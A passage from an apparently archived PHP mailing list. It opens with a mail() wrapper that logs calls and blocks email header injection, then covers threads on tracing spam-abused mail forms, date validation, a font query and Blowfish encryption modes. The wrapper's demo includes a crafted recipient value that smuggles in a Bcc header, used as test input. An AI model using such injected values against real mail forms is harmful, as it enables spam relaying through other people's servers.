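    $logFile = $logFile ?? sys_get_temp_dir() . '/mail_filtered.log';

    // Shallow backtrace: frame 0 holds the file and line that called us.
    $trace  = debug_backtrace(DEBUG_BACKTRACE_IGNORE_ARGS, 1);
    $caller = ($trace[0]['file'] ?? '?') . ':' . ($trace[0]['line'] ?? 0);

    // To and Subject are single header lines, so a CR or LF in either one
    // means the value is trying to start a new header (for example Bcc).
    $blocked = [];
    foreach (['to' => $to, 'subject' => $subject] as $field => $value) {
        if (preg_match('/[\r\n]/', $value)) {
            $blocked[] = $field;
        }
    }

    // Extra headers may legitimately span lines; count recipient headers so a
    // reviewer can spot scripts whose forms end up adding To/Cc/Bcc lines.
    $rcptHeaders = preg_match_all('/^\s*(?:to|cc|bcc)\s*:/mi', $headers);

    $entry = sprintf(
        "%s ip=%s script=%s caller=%s to=%s rcpt_headers=%d verdict=%s\n",
        date('c'),
        $_SERVER['REMOTE_ADDR'] ?? 'cli',
        $_SERVER['SCRIPT_FILENAME'] ?? 'cli',
        $caller,
        // JSON-encode so an embedded newline shows up as \n on one log line
        json_encode($to, JSON_INVALID_UTF8_SUBSTITUTE | JSON_UNESCAPED_SLASHES),
        $rcptHeaders,
        $blocked ? 'BLOCKED(' . implode(',', $blocked) . ')' : 'passed'
    );
    file_put_contents($logFile, $entry, FILE_APPEND | LOCK_EX);

    if ($blocked) {
        return false; // never reaches the mail transport
    }
    $send = $send ?? 'mail'; // real mail() unless a test hook is supplied
    return (bool) $send($to, $subject, $message, $headers);
}

// Demo with a stub sender so nothing leaves the machine.
$stub = function ($to, $subject, $message, $headers) {
    return true;
};
$log = sys_get_temp_dir() . '/mail_filtered_demo.log';
@unlink($log);

// A normal contact-form message.
var_dump(mail_filtered('alice@example.com', 'Contact form', 'hello',
                       'From: site@example.com', $stub, $log));

// A "to" field carrying an injected bcc header.
var_dump(mail_filtered("alice@example.com\nbcc:victim@example.net",
                       'Contact form', 'hello', '', $stub, $log));

echo file_get_contents($log);
```

Each log line names the calling file and line, so once `mail()` calls are switched to `mail_filtered()`, the script that produces the `BLOCKED` entries or the bulk of the volume is the one being abused.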




Re: [PHP] Battle of Spam

2010-06-07 Thread Karl DeSaulniers
Well you could do just that but after you turn it back on. Set up a
fresh error log based on the reset of the mail server. You then have
some kind of script monitoring the in and out of your server.
Disconnecting the mail server momentarily and maybe a pass reset for
your users would stunt the hacker for a second, but would help you set
up a line of defense before they found a way back in. I am not a sysad
myself, but that seems like a logical way about it. If you let your
users know ahead of time that this server and pass reset is to save
their server from attack, most will oblige. Also let them know to not
use the same password. There may be a better solution though that I
don't know of. I'll let the gurus interject. :)


Hth

Karl

Sent from losPhone

On Jun 7, 2010, at 4:34 PM, Brian Dunning br...@briandunning.com  
wrote:


I think I must have misstated the problem. Thanks to everyone for  
the replies, but the question is not how to fix it, it's how to find  
the script being attacked. Many different admins manage many  
different sites on this server, and I can't even begin to guess how  
many mail forms are on there from different programmers.


I'm currently downloading the logs as Peter suggested, and will take  
a look. I'm not much of a sysad and I just thought maybe someone  
might know a way to sniff outgoing email or something, I really  
don't know how to attack this. Fixing the scripts is a long term  
solution, obviously, but I need a short term fix other than killing  
email on the apache account.


Might be more of a Linux question than a PHP question.





Re: [PHP] Battle of Spam

2010-06-07 Thread Jim Lucas
Brian Dunning wrote:
 I think I must have misstated the problem. Thanks to everyone for the 
 replies, but the question is not how to fix it, it's how to find the script 
 being attacked. Many different admins manage many different sites on this 
 server, and I can't even begin to guess how many mail forms are on there from 
 different programmers.
 
 I'm currently downloading the logs as Peter suggested, and will take a look. 
 I'm not much of a sysad and I just thought maybe someone might know a way to 
 sniff outgoing email or something, I really don't know how to attack this. 
 Fixing the scripts is a long term solution, obviously, but I need a short 
 term fix other than killing email on the apache account.
 
 Might be more of a Linux question than a PHP question.
 
 

I think you misunderstood Robert's suggestion.  Please go back and re-read his
message.  Once you understand what information will be sent to you, you will
realize by implementing this technique that you will be given all the
information you need to identify the source of the problem.  Then, hopefully you
will also get the information you need to know how to resolve your issue.

-- 
Jim Lucas

A: Maybe because some people are too annoyed by top-posting.
Q: Why do I not get an answer to my question(s)?
A: Because it messes up the order in which people normally read text.
Q: Why is top-posting such a bad thing?




Re: [PHP] Battle of Spam

2010-06-07 Thread Brian Dunning
I'm currently geotargeting all the IPs in the log, and focusing on the hits 
from Russia (the majority of these apache@ spams seem to be Russian). I've got 
a much shorter list of scripts to look at now. Hopefully I'll find some that 
just use mail() with no scrubbing.



Re: [PHP] Battle of Spam

2010-06-07 Thread Ashley Sheridan
On Mon, 2010-06-07 at 17:29 -0700, Brian Dunning wrote:

 I'm currently geotargeting all the IPs in the log, and focusing on the hits 
 from Russia (the majority of these apache@ spams seem to be Russian). I've 
 got a much shorter list of scripts to look at now. Hopefully I'll find some 
 that just use mail() with no scrubbing.


I wouldn't bother wasting your time on that to be honest, as spam could
just as easily come from zombie machines, which could be scattered all
over the globe. This sort of distributed attacking seems to be more and
more commonplace these days.

Thanks,
Ash
http://www.ashleysheridan.co.uk




Re: [PHP] complex if statement for field validation

2010-06-07 Thread Jim Lucas
David Mehler wrote:
 Hello,
 I've got a form with three fields that are not required for proper
 completion of it, ending month, day, year fields. If a user enters
 nothing no problem, but if those form fields are entered I need them
 validated. They have to be in the correct format YYYY-MM-DD date
 format and that value also has to be greater than the starting date
 validated previously. I've got some not working code.
 Thanks.
 Dave.
 
 // if an ending date field was entered validate that
 // also must be greater than the starting date values
 if(!empty($_POST['month1']) && !empty($_POST['day1']) &&
 !empty($_POST['year1']) {
 $month1=$_POST['month1'];
 $day1=$_POST['day1'];
 $year1=$_POST['year1'];
 $date_value1="$year1-$month1-$day1";
 }
 if(!checkdate($month1,$day1,$year1)) {
 echo "Invalid Date.\n";
 } else {
 echo "Entered Date is correct.\n";
 }
 }
 if(!checkdate($month1,$day1,$year1))  $date_value {
 echo "Invalid Date.\n";
 } else {
 echo "Entered Date is correct.\n";
 }
 

Well, I don't know if they are cut/paste errors, but you have a few syntax
errors in the above code...

# Initialize your date container variables

$date_value_ts = $date_value1_ts = null;


# Setup start date stuff
if (  !empty($_POST['month']) &&
      !empty($_POST['day']) &&
      !empty($_POST['year']) )
{
    $month      = (int)$_POST['month'];
    $day        = (int)$_POST['day'];
    $year       = (int)$_POST['year'];
    $date_value = "{$year}-{$month}-{$day}";

    # checkdate() rejects impossible dates such as 2010-2-31, which
    # strtotime() alone would roll over into March instead of failing
    if ( !checkdate($month, $day, $year) ||
         ($date_value_ts = strtotime($date_value) ) === FALSE )
    {
        echo "Invalid Date.\n";
    } else {
        echo "Entered Date is correct.\n";
    }

}


# Test for the end date fields
if (  !empty($_POST['month1']) &&
      !empty($_POST['day1']) &&
      !empty($_POST['year1']) )
{
    $month1      = (int)$_POST['month1'];
    $day1        = (int)$_POST['day1'];
    $year1       = (int)$_POST['year1'];
    $date_value1 = "{$year1}-{$month1}-{$day1}";

    if ( !checkdate($month1, $day1, $year1) ||
         ($date_value1_ts = strtotime($date_value1) ) === FALSE )
    {
        # FALSE (not null) so the comparison below still reports the bad end date
        $date_value1_ts = FALSE;
        echo "Invalid Date.\n";
    } else {
        echo "Entered Date is correct.\n";
    }

}

# Compare the two dates.  Make sure end date is after start date

if ( !is_null($date_value1_ts) &&
     ( (int)$date_value_ts >= (int)$date_value1_ts ) )
{
    echo "Invalid Date.\n";
} else {
    echo "Entered Date is correct.\n";
}


-- 
Jim Lucas

A: Maybe because some people are too annoyed by top-posting.
Q: Why do I not get an answer to my question(s)?
A: Because it messes up the order in which people normally read text.
Q: Why is top-posting such a bad thing?




[PHP] Finding a font.

2010-06-07 Thread David McGlone
Sorry everyone, I know this isn't PHP related and I hope I'm not out of line, 
If I am I sincerely apologize. I don't know who else I could ask.

What I want to know if anyone can recognize this font. I have searched the web 
high and low and can't find any matching letter A's in the font examples. I 
could have found the correct font, but didn't have the A to compare it to. 
I've also checked Ooo.org's list of fonts and Gimp's list of fonts without any 
luck. Anyway I stuck the image of the letter on my website

http://www.dmcentral.net/letterA.jpg

-- 
Blessings,
David M.




Re: [PHP] Finding a font.

2010-06-07 Thread Karl DeSaulniers

Hi Dave,
It is called Fine Hand I believe. Found a copy here.

http://www.fonts.com/FindFonts/Detail.htm?pid=203813/cgi-bin/ 
MsmGo.exe?grab_id=0page_id=8346query=HANDWRITINGSCOPE=Fonts


HTH,

Karl



On Jun 7, 2010, at 9:01 PM, David McGlone wrote:

Sorry everyone, I know this isn't PHP related and I hope I'm not  
out of line,

If I am I sincerely apologize. I don't know who else I could ask.

What I want to know if anyone can recognize this font. I have  
searched the web
high and low and can't find any matching letter A's in the font  
examples. I
could have found the correct font, but didn't have the A to  
compare it to.
I've also checked Ooo.org's list of fonts and Gimp's list of fonts  
without any

luck. Anyway I stuck the image of the letter on my website

http://www.dmcentral.net/letterA.jpg

--
Blessings,
David M.




Karl DeSaulniers
Design Drumm
http://designdrumm.com





Re: [PHP] Battle of Spam

2010-06-07 Thread Paul M Foster
On Mon, Jun 07, 2010 at 02:34:23PM -0700, Brian Dunning wrote:

 I think I must have misstated the problem. Thanks to everyone for the 
 replies, but the question is not how to fix it, it's how to find the script 
 being attacked. Many different admins manage many different sites on this 
 server, and I can't even begin to guess how many mail forms are on there from 
 different programmers.
 
 I'm currently downloading the logs as Peter suggested, and will take a look. 
 I'm not much of a sysad and I just thought maybe someone might know a way to 
 sniff outgoing email or something, I really don't know how to attack this. 
 Fixing the scripts is a long term solution, obviously, but I need a short 
 term fix other than killing email on the apache account.
 
 Might be more of a Linux question than a PHP question.

One other piece of information maybe you left out. You say there are
many admins of many sites on this box. Do you *work* for the company
that owns or rents the box or something? Otherwise, other admins'
scripts aren't your problem, just your scripts.

Paul

-- 
Paul M. Foster




[PHP] Blowfish Encryption

2010-06-07 Thread Paul M Foster
I've got a file of passwords I'd like to encrypt/decrypt using blowfish. I'd
like to be able to do so with PHP and via the command line. I have a
Linux utility called bcrypt which encrypts/decrypts files using
blowfish. And I'm using the following code under PHP to do
encryption/decryption:

$raw_data = file('junk');
$input = implode('', $raw_data);

$td = mcrypt_module_open(MCRYPT_BLOWFISH, '', MCRYPT_MODE_ECB, '');
$iv = mcrypt_create_iv (mcrypt_enc_get_iv_size($td), MCRYPT_RAND);
mcrypt_generic_init($td, $key, $iv);
$encrypted_data = mcrypt_generic($td, $input);
file_put_contents('encjunk', $encrypted_data);
mcrypt_generic_deinit($td);
mcrypt_module_close($td);


Now, here's the problem. I'm using bcrypt to encrypt my junk file and
dump it out to an encrypted file. And I'm using the above PHP code to
encrypt the same file out to a different file. Using the same keys in
both cases, I get different encrypted files.

My logic: using the same encryption method and the same key, two
different implementations should produce equivalent files.

Yet they don't. I'm guessing that the initialization vector is
different between the two implementations, resulting in the difference
between the encrypted files.

For those who know more about encryption than I do, does that sound
right?

Paul

-- 
Paul M. Foster




Re: [PHP] Finding a font.

2010-06-07 Thread Adam Richardson
On Mon, Jun 7, 2010 at 10:22 PM, Karl DeSaulniers k...@designdrumm.com wrote:

 Hi Dave,
 It is called Fine Hand I believe. Found a copy here.


 http://www.fonts.com/FindFonts/Detail.htm?pid=203813/cgi-bin/MsmGo.exe?grab_id=0page_id=8346query=HANDWRITINGSCOPE=Fonts

 HTH,

 Karl




 On Jun 7, 2010, at 9:01 PM, David McGlone wrote:

  Sorry everyone, I know this isn't PHP related and I hope I'm not out of line.
  If I am I sincerely apologize. I don't know who else I could ask.

  What I want to know is if anyone can recognize this font. I have searched the
  web high and low and can't find any matching letter A's in the font examples.
  I could have found the correct font, but didn't have the A to compare it to.
  I've also checked Ooo.org's list of fonts and Gimp's list of fonts without
  any luck. Anyway I stuck the image of the letter on my website

 http://www.dmcentral.net/letterA.jpg

 --
 Blessings,
 David M.



 Karl DeSaulniers
 Design Drumm
 http://designdrumm.com





I believe Karl nailed it. And, for future reference, WhatTheFont works
quite well for this type of thing most of the time. I quickly tested the
image (after quickly pulling out the background), and it was one of the top
suggestions.

Adam

-- 
Nephtali:  PHP web framework that functions beautifully
http://nephtaliproject.com


Re: [PHP] Blowfish Encryption

2010-06-07 Thread Adam Richardson
On Mon, Jun 7, 2010 at 11:20 PM, Paul M Foster pa...@quillandmouse.com wrote:

 I've got a file of passwords I'd like to encrypt/decrypt using blowfish. I'd
 like to be able to do so with PHP and via the command line. I have a
 Linux utility called bcrypt which encrypts/decrypts files using
 blowfish. And I'm using the following code under PHP to do
 encryption/decryption:

 $raw_data = file('junk');
 $input = implode('', $raw_data);

 $td = mcrypt_module_open(MCRYPT_BLOWFISH, '', MCRYPT_MODE_ECB, '');
 $iv = mcrypt_create_iv (mcrypt_enc_get_iv_size($td), MCRYPT_RAND);
 mcrypt_generic_init($td, $key, $iv);
 $encrypted_data = mcrypt_generic($td, $input);
 file_put_contents('encjunk', $encrypted_data);
 mcrypt_generic_deinit($td);
 mcrypt_module_close($td);


 Now, here's the problem. I'm using bcrypt to encrypt my junk file and
 dump it out to an encrypted file. And I'm using the above PHP code to
 encrypt the same file out to a different file. Using the same keys in
 both cases, I get different encrypted files.

 My logic: using the same encryption method and the same key, two
 different implementations should produce equivalent files.

 Yet they don't. I'm guessing that the initialization vector is
 different between the two implementations, resulting in the difference
 between the encrypted files.

 For those who know more about encryption than I do, does that sound
 right?

 Paul

 --
 Paul M. Foster



ECB (Electronic Code Book) mode works without an initialization vector.
Imagine having a big, thick code book, and every possible 8-letter
combination in the book. To encrypt the message, you thumb through the book
and find the plain text THE KIDS, and write down its cipher text
representation, JKWSCTFI. Easy to implement, and easy to maintain (you
don't have to make sure an IV is shared between the exchanging parties.)

If one has multiple samples of encrypted emails, it's likely that
several of the samples will end using the same cipher text, as many people
end their emails with a consistent signature. This repeated cipher text
improves the ability of those trying to attack (decrypt the message.)
Hence, most professionals recommend avoiding ECB mode.

Now, looking at your PHP code, I see that it appears you're mixing and
matching some of the families of calls in ways that might lead to unexpected
results. Try the below:

$ciphertext = mcrypt_encrypt(
    $cipher = MCRYPT_BLOWFISH,
    $key,
    $plaintext,
    // I just tossed this in as an example, but you should match the mode bcrypt is using
    $mode = 'cbc',
    // needed for decryption, too, although it doesn't have to remain a secret.
    $iv = 'use only once, sometimes a count, or a date'
);

Hope this helps,

Adam
-- 
Nephtali:  PHP web framework that functions beautifully
http://nephtaliproject.com
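
Added example, not part of the original thread or either poster's code: the ECB repetition Adam describes and the "same key, different output" mismatch Paul reports, shown with PHP's OpenSSL extension. AES-128 stands in for Blowfish here because mcrypt was removed from PHP in 7.2; the key, plaintext and helper names are constructed for the demonstration.

```php
<?php
// Added example, not from the thread. AES-128 via the OpenSSL extension stands in
// for Blowfish/mcrypt (assumption); ECB/CBC behave the same way for any block cipher.
const BLOCK = 16; // AES block size in bytes (Blowfish uses 8)

// Split raw ciphertext into hex-encoded blocks so repeats are visible.
function hex_blocks(string $ciphertext): array
{
    return array_map('bin2hex', str_split($ciphertext, BLOCK));
}

// Encrypt with an explicit mode and IV; ECB takes no IV.
function encrypt(string $plaintext, string $key, string $mode, string $iv = ''): string
{
    $out = openssl_encrypt($plaintext, "aes-128-$mode", $key, OPENSSL_RAW_DATA, $iv);
    if ($out === false) {
        throw new RuntimeException('encryption failed: ' . openssl_error_string());
    }
    return $out;
}

// Constructed inputs: a fixed demo key and a message that repeats one 16-byte block.
$key       = substr(hash('sha256', 'constructed demo passphrase', true), 0, BLOCK);
$plaintext = str_repeat('THE KIDS ARE OK.', 3) . 'SEE YOU TOMORROW';

// ECB: identical plaintext blocks give identical ciphertext blocks, every time.
$ecb = hex_blocks(encrypt($plaintext, $key, 'ecb'));
printf("ECB distinct blocks: %d of %d\n", count(array_unique($ecb)), count($ecb));

// CBC: each block is chained to the previous one, so the repeats disappear.
$ivA  = random_bytes(BLOCK);
$cbcA = encrypt($plaintext, $key, 'cbc', $ivA);
$cbcB = encrypt($plaintext, $key, 'cbc', random_bytes(BLOCK));
$blocksA = hex_blocks($cbcA);
printf("CBC distinct blocks: %d of %d\n", count(array_unique($blocksA)), count($blocksA));

// Same cipher, key and plaintext, different IV: the outputs do not match.
printf("CBC outputs equal with different IVs: %s\n", var_export($cbcA === $cbcB, true));

// Same IV as well: the outputs match byte for byte, which is what two
// implementations need (plus the same mode, padding and key bytes) to agree.
printf("CBC outputs equal with the same IV: %s\n",
    var_export(encrypt($plaintext, $key, 'cbc', $ivA) === $cbcA, true));

// Decryption needs the IV too, so it is stored next to the ciphertext (not secret).
$stored = $ivA . $cbcA;
$back   = openssl_decrypt(substr($stored, BLOCK), 'aes-128-cbc', $key,
    OPENSSL_RAW_DATA, substr($stored, 0, BLOCK));
printf("Round trip ok: %s\n", var_export($back === $plaintext, true));
```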